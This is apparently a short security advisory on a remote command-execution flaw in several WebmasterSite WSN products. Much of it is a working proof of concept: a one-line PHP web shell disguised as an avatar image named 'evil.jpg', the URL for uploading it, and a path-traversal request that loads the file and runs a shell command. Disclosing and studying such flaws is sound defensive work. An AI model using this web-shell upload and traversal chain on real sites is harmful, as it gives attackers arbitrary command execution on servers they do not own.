Multiple WebmasterSite products are prone to a remote shell command-execution vulnerability because the applications fail to sufficiently sanitize user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary commands in the context of the affected application.
This issue affects the following products:
WSN Forum 4.1.43
WSN Knowledge Base 4.1.36
WSN Links 4.1.44
WSN Gallery 4.1.30
Note that previous versions may also be vulnerable.
Avatar evil.jpg source:
<? system($_GET['cmd']); ?>
Enter to upload:
http://www.example.com/forum/profile.php?action=editprofile&id=[Your User ID]
See the avatar name at your profile.
Upload evil avatar and go to:
http://www.example.com/index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al